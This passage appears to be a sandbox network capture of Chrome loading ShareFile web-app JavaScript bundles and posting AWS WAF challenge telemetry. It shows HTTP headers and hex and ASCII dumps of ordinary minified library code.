                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 61 6c 6c 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 44 4b 2e 72 65 71 75 65 73 74 49 6e 73 74 61 6c 6c 53 6f 6c 75 74 69 6f 6e 28 65 29 7d 7d 2c 7b 6b 65 79 3a 22 75 70 64 61 74 65 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 44 4b 2e 75 70 64 61 74 65 53 6f 6c 75 74 69 6f 6e 28 65 29 7d 7d 2c 7b 6b 65 79 3a 22 75 6e 69 6e 73 74 61 6c 6c 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 44 4b 2e 75 6e 69 6e 73 74 61 6c 6c 53 6f 6c
                                                                                                                                                                                                                      Data Ascii: allSolution",value:function(e){return this.initializedSDK.requestInstallSolution(e)}},{key:"updateSolution",value:function(e){return this.initializedSDK.updateSolution(e)}},{key:"uninstallSolution",value:function(e){return this.initializedSDK.uninstallSol


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      99192.168.2.174982118.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC407OUTGET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC448INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:18 GMT
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73b2-7ea4a679425523e141716a25
                                                                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                                                                      Via: 1.1 fa1d164da2e001fd457ab863d748d2b0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: 7tdjmWcYIQwOxcZRJsjpBim0KB333Fv2iun6fO25Uk7nKS-2MfeOPA==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      100192.168.2.174981713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC607OUTGET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 355264
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:10:50 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:19 GMT
                                                                                                                                                                                                                      ETag: "cd405d48fdfd34cb6be76832783f37fc"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 edd6d90087c4f2b49e182778a2273adc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: f2__489lsXaKj0qScBxnKEIQkfgc5YmS9oY983PE8tkZrZhm4R8_HQ==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 64 61 73 68 62 6f 61 72 64 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6c 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 41 63 63 6f 75 6e 74 73 45 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},l={},o={},i={},c={};return{setters:[function(e){n.AccountsEn
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 6e 63 61 74 28 6e 29 5d 7c 7c 41 29 7d 29 29 7d 29 29 3a 4e 28 50 2c 75 2c 41 29 29 7d 70 3d 74 68 69 73 2e 65 78 74 65 6e 64 54 72 61 6e 73 6c 61 74 69 6f 6e 28 70 2c 65 2c 74 2c 76 2c 72 29 2c 42 26 26 70 3d 3d 3d 75 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 4e 61 6d 65 73 70 61 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 26 26 28 70 3d 22 22 2e 63 6f 6e 63 61 74 28 66 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 75 29 29 2c 28 42 7c 7c 56 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 26 26 28 70 3d 22 76 31 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73
                                                                                                                                                                                                                      Data Ascii: ncat(n)]||A)}))})):N(P,u,A))}p=this.extendTranslation(p,e,t,v,r),B&&p===u&&this.options.appendNamespaceToMissingKey&&(p="".concat(f,":").concat(u)),(B||V)&&this.options.parseMissingKeyHandler&&(p="v1"!==this.options.compatibilityAPI?this.options.parseMiss
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 63 61 74 28 6e 2c 22 20 66 6f 72 20 69 6e 74 65 72 70 6f 6c 61 74 69 6e 67 20 22 29 2e 63 6f 6e 63 61 74 28 65 29 29 2c 6f 3d 22 22 7d 65 6c 73 65 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 7c 7c 63 2e 75 73 65 52 61 77 56 61 6c 75 65 54 6f 45 73 63 61 70 65 7c 7c 28 6f 3d 4d 28 6f 29 29 3b 76 61 72 20 75 3d 74 2e 73 61 66 65 56 61 6c 75 65 28 6f 29 3b 69 66 28 65 3d 65 2e 72 65 70 6c 61 63 65 28 6c 5b 30 5d 2c 75 29 2c 73 3f 28 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 2b 3d 6f 2e 6c 65 6e 67 74 68 2c 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 2d 3d 6c 5b 30 5d 2e 6c 65 6e 67 74 68 29 3a 74 2e 72 65 67 65 78 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 2b 2b 69 3e 3d 63 2e 6d 61 78 52 65 70 6c 61 63 65 73 29 62 72 65 61 6b 7d 7d 29
                                                                                                                                                                                                                      Data Ascii: cat(n," for interpolating ").concat(e)),o=""}else"string"==typeof o||c.useRawValueToEscape||(o=M(o));var u=t.safeValue(o);if(e=e.replace(l[0],u),s?(t.regex.lastIndex+=o.length,t.regex.lastIndex-=l[0].length):t.regex.lastIndex=0,++i>=c.maxReplaces)break}})
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC15108INData Raw: 61 74 69 62 69 6c 69 74 79 41 50 49 26 26 21 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 29 72 65 74 75 72 6e 20 74 28 6e 75 6c 6c 2c 65 2e 74 2e 62 69 6e 64 28 65 29 29 3b 65 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 65 2e 6f 70 74 69 6f 6e 73 2e 6c 6e 67 2c 74 29 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 6f 75 72 63 65 73 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 69 74 49 6d 6d 65 64 69 61 74 65 3f 66 28 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 2c 30 29 2c 68 7d 7d 2c 7b 6b 65 79 3a 22 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                      Data Ascii: atibilityAPI&&!e.isInitialized)return t(null,e.t.bind(e));e.changeLanguage(e.options.lng,t)};return this.options.resources||!this.options.initImmediate?f():setTimeout(f,0),h}},{key:"loadResources",value:function(e){var t=this,n=arguments.length>1&&argumen
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC143INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 72 2e 73 65 61 72 63 68 52 65 67 65 78 2e 74 65 73 74 28 65 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 6c 3d 65 2e 72 65 70 6c 61 63 65 28 72 2e 72 65 70 6c 61 63 65 52 65 67 65 78 2c 22 24 31 22 29 2c 6f 3d 6e 5b 6c 5d 3b 69 66 28 21 6f 29 72 65 74 75 72 6e 20 72 2e 6b 65 65 70 55 6e 6b 6e 6f 77 6e 56 61 72 69 61 62 6c 65 73 3f 65 3a 22 22 3b 69 66 28 6f 2e 24 24
                                                                                                                                                                                                                      Data Ascii: ((function(e,t){if(!r.searchRegex.test(e))return e;var l=e.replace(r.replaceRegex,"$1"),o=n[l];if(!o)return r.keepUnknownVariables?e:"";if(o.$$
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 74 79 70 65 6f 66 29 72 65 74 75 72 6e 20 6b 65 28 6f 2c 4c 65 28 6f 2c 74 29 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6f 29 7b 76 61 72 20 69 3d 6f 28 29 3b 72 65 74 75 72 6e 20 6b 65 28 69 2c 4c 65 28 69 2c 74 29 29 7d 72 65 74 75 72 6e 20 6f 7d 29 29 7d 7d 5d 29 26 26 43 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 65 7d 28 29 3b 63 6f 6e 73 74 20 41 65 3d 4f 65 3b 76 61 72 20 53 65 3d 5b 22 72 65 73 6f 75 72 63 65 73 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 46 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65
                                                                                                                                                                                                                      Data Ascii: typeof)return ke(o,Le(o,t));if("function"==typeof o){var i=o();return ke(i,Le(i,t))}return o}))}}])&&Ce(t.prototype,n),e}();const Ae=Oe;var Se=["resources","namespace"];function Fe(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.ge
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 4d 61 74 68 2e 6d 61 78 28 6c 2e 62 2c 30 29 29 2c 61 3a 6f 7d 7d 76 61 72 20 62 3d 22 28 3f 3a 22 2e 63 6f 6e 63 61 74 28 22 5b 2d 5c 5c 2b 5d 3f 5c 5c 64 2a 5c 5c 2e 5c 5c 64 2b 25 3f 22 2c 22 29 7c 28 3f 3a 22 29 2e 63 6f 6e 63 61 74 28 22 5b 2d 5c 5c 2b 5d 3f 5c 5c 64 2b 25 3f 22 2c 22 29 22 29 2c 52 3d 22 5b 5c 5c 73 7c 5c 5c 28 5d 2b 28 22 2e 63 6f 6e 63 61 74 28 62 2c 22 29 5b 2c 7c 5c 5c 73 5d 2b 28 22 29 2e 63 6f 6e 63 61 74 28 62 2c 22 29 5b 2c 7c 5c 5c 73 5d 2b 28 22 29 2e 63 6f 6e 63 61 74 28 62 2c 22 29 5c 5c 73 2a 5c 5c 29 3f 22 29 2c 48 3d 22 5b 5c 5c 73 7c 5c 5c 28 5d 2b 28 22 2e 63 6f 6e 63 61 74 28 62 2c 22 29 5b 2c 7c 5c 5c 73 5d 2b 28 22 29 2e 63 6f 6e 63 61 74 28 62 2c 22 29 5b 2c 7c 5c 5c 73 5d 2b 28 22 29 2e 63 6f 6e 63 61 74 28 62
                                                                                                                                                                                                                      Data Ascii: Math.max(l.b,0)),a:o}}var b="(?:".concat("[-\\+]?\\d*\\.\\d+%?",")|(?:").concat("[-\\+]?\\d+%?",")"),R="[\\s|\\(]+(".concat(b,")[,|\\s]+(").concat(b,")[,|\\s]+(").concat(b,")\\s*\\)?"),H="[\\s|\\(]+(".concat(b,")[,|\\s]+(").concat(b,")[,|\\s]+(").concat(b
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC16384INData Raw: 2e 35 61 38 2e 39 33 20 38 2e 39 33 20 30 20 30 20 30 20 36 2e 32 36 32 2d 32 2e 35 35 32 20 38 2e 36 35 20 38 2e 36 35 20 30 20 30 20 30 20 32 2e 35 39 34 2d 36 2e 31 36 33 20 38 2e 36 35 20 38 2e 36 35 20 30 20 30 20 30 2d 32 2e 35 39 34 2d 36 2e 31 36 32 41 38 2e 39 33 20 38 2e 39 33 20 30 20 30 20 30 20 31 32 20 34 2e 30 37 4d 36 2e 37 36 20 37 2e 36 33 41 37 2e 34 37 20 37 2e 34 37 20 30 20 30 20 31 20 31 32 20 35 2e 34 39 33 63 31 2e 39 36 35 20 30 20 33 2e 38 35 2e 37 36 38 20 35 2e 32 34 20 32 2e 31 33 36 61 37 2e 32 33 20 37 2e 32 33 20 30 20 30 20 31 20 32 2e 31 37 20 35 2e 31 35 36 63 30 20 31 2e 39 33 34 2d 2e 37 38 20 33 2e 37 38 39 2d 32 2e 31 37 20 35 2e 31 35 36 41 37 2e 34 37 20 37 2e 34 37 20 30 20 30 20 31 20 31 32 20 32 30 2e 30 37 37
                                                                                                                                                                                                                      Data Ascii: .5a8.93 8.93 0 0 0 6.262-2.552 8.65 8.65 0 0 0 2.594-6.163 8.65 8.65 0 0 0-2.594-6.162A8.93 8.93 0 0 0 12 4.07M6.76 7.63A7.47 7.47 0 0 1 12 5.493c1.965 0 3.85.768 5.24 2.136a7.23 7.23 0 0 1 2.17 5.156c0 1.934-.78 3.789-2.17 5.156A7.47 7.47 0 0 1 12 20.077
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC15108INData Raw: 7b 7d 2c 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 47 74 7d 29 29 7d 2c 4b 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 22 31 65 6d 22 2c 68 65 69 67 68 74 3a 22 31 65 6d 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 64 3a 22 4d 37 2e 35 34 37 20 32 2e 32 34 39 63 2d 2e 36 38 36 20 30 2d 31 2e 33 34 35 2e 32 37 2d 31 2e 38 33 2e 37 35 61 32 2e
                                                                                                                                                                                                                      Data Ascii: {},e,{component:Gt}))},Kt=function(){return l.createElement("svg",{xmlns:"http://www.w3.org/2000/svg",width:"1em",height:"1em",fill:"currentColor",viewBox:"0 0 24 24"},l.createElement("path",{fill:"currentColor",d:"M7.547 2.249c-.686 0-1.345.27-1.83.75a2.
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC1276INData Raw: 36 2e 36 37 31 20 33 2e 39 38 20 31 2e 38 30 39 20 35 2e 35 33 39 4c 32 20 32 31 2e 37 34 39 68 31 30 2e 33 35 33 63 35 2e 33 32 38 20 30 20 39 2e 36 34 37 2d 34 2e 32 35 33 20 39 2e 36 34 37 2d 39 2e 35 73 2d 34 2e 33 32 2d 39 2e 35 2d 39 2e 36 34 37 2d 39 2e 35 6d 34 2e 33 38 35 20 38 2e 32 30 35 68 2d 38 2e 37 37 56 39 2e 32 32 36 68 38 2e 37 37 7a 6d 2d 38 2e 37 37 20 34 2e 33 31 38 68 36 2e 31 33 39 76 2d 31 2e 37 32 38 68 2d 36 2e 31 34 7a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 7d 29 29 7d 2c 4e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 67 65 2c 72 28 7b 7d 2c 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 44 6e 7d 29 29 7d 2c 55 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                      Data Ascii: 6.671 3.98 1.809 5.539L2 21.749h10.353c5.328 0 9.647-4.253 9.647-9.5s-4.32-9.5-9.647-9.5m4.385 8.205h-8.77V9.226h8.77zm-8.77 4.318h6.139v-1.728h-6.14z",clipRule:"evenodd"}))},Nn=function(e){return l.createElement(ge,r({},e,{component:Dn}))},Un=function(){


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      101192.168.2.174982018.239.18.504437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC653OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 1801
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC1801OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 64 4d 79 49 78 37 76 48 41 41 41 41 3a 38 34 5a 44 6b 69 51 77 64 4e 50 46 4e 69 50 2f 67 6f 63 76 50 59 43 54 68 76 55 4a 56 77 57 41 68 46 55 64 51 39 65 33 30 53 36 37 58 42 72 62 64 35 50 38 45 66 38 56 4b 44 72 39 38 58 42 55 78 6f 79 68 64 69 45 75 2b 38 73 52 71 79 53 2f 43 59 53 30 4f 50 58 78 41 45 35 36 76 52 30 63 6b 61 50 6c 31 44 63 64 34 33 4a 6e 6a 31 4d 41 72 78 41 4f 6b 49 6e 49 44 4f 35 43 73 43 4d 4f 36 6b 71 6a 75 45 42 74 66 31 5a 53 65 4c 62 4f 47 74 4b 63 77 4b 35 73 7a 6c 38 6d 66 4f 41 71 67 64 5a 69 59 4d 54 62 54 69 44 6f 2f 76 77 36 74 74 41 4e 68 6d
                                                                                                                                                                                                                      Data Ascii: {"existing_token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAdMyIx7vHAAAA:84ZDkiQwdNPFNiP/gocvPYCThvUJVwWAhFUdQ9e30S67XBrbd5P8Ef8VKDr98XBUxoyhdiEu+8sRqyS/CYS0OPXxAE56vR0ckaPl1Dcd43Jnj1MArxAOkInIDO5CsCMO6kqjuEBtf1ZSeLbOGtKcwK5szl8mfOAqgdZiYMTbTiDo/vw6ttANhm
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 948
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:18 GMT
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73b2-1a0e83665b2465b61b3a1ca7
                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                      cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 32301bfd0e3b06c528ccd8abdb13411e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: W4-thGTgQYUuL-mpPxcJUBYlXkLipX0nLwI9IbzmRvvQSGl986zgsg==
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC948INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 31 32 62 66 39 37 35 31 2d 61 31 32 36 2d 34 32 64 35 2d 62 30 35 38 2d 64 33 35 62 33 61 61 34 32 34 34 61 3a 45 51 6f 41 61 5a 6d 4a 74 6a 73 4f 41 41 41 41 3a 78 6b 52 6c 69 73 56 30 36 38 39 54 31 6a 6d 76 6d 77 78 6d 48 7a 31 73 4c 35 62 4d 39 57 75 53 48 2b 72 58 6a 77 49 68 59 52 36 71 57 77 38 4e 4f 68 4b 67 4c 43 41 50 77 4c 71 74 33 66 53 62 6a 62 67 7a 67 69 75 41 7a 4b 79 58 2b 37 74 53 6a 62 67 57 79 32 34 66 49 56 76 57 47 4b 4b 56 6f 67 2f 2b 72 4c 64 44 66 50 49 61 79 61 4d 64 4c 65 61 4c 36 4e 45 51 75 71 79 57 66 77 2f 58 2b 44 6e 72 62 59 7a 32 68 44 47 43 31 71 67 44 35 4b 35 69 50 7a 61 45 5a 49 74 6b 72 41 71 6d 77 77 58 69 52 64 4e 6e 75 37 73 58 42 39 6f 33 53 4a 76 55 70 33 4c 71 4c 31 77 59 53 67 62
                                                                                                                                                                                                                      Data Ascii: {"token":"12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgb


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      102192.168.2.174982213.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC418OUTGET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 178957
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 22:57:01 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:18 GMT
                                                                                                                                                                                                                      ETag: "826da847895415a16e1d242afd0f2ba7"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f797fc0ae68a3abc35e081e46174c9f2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: DPl5ICctNLp75L9kCvFjmaLXOx9LFRqFlMP9Oq3H5u0q7ygxsADZ_Q==
                                                                                                                                                                                                                      Age: 1
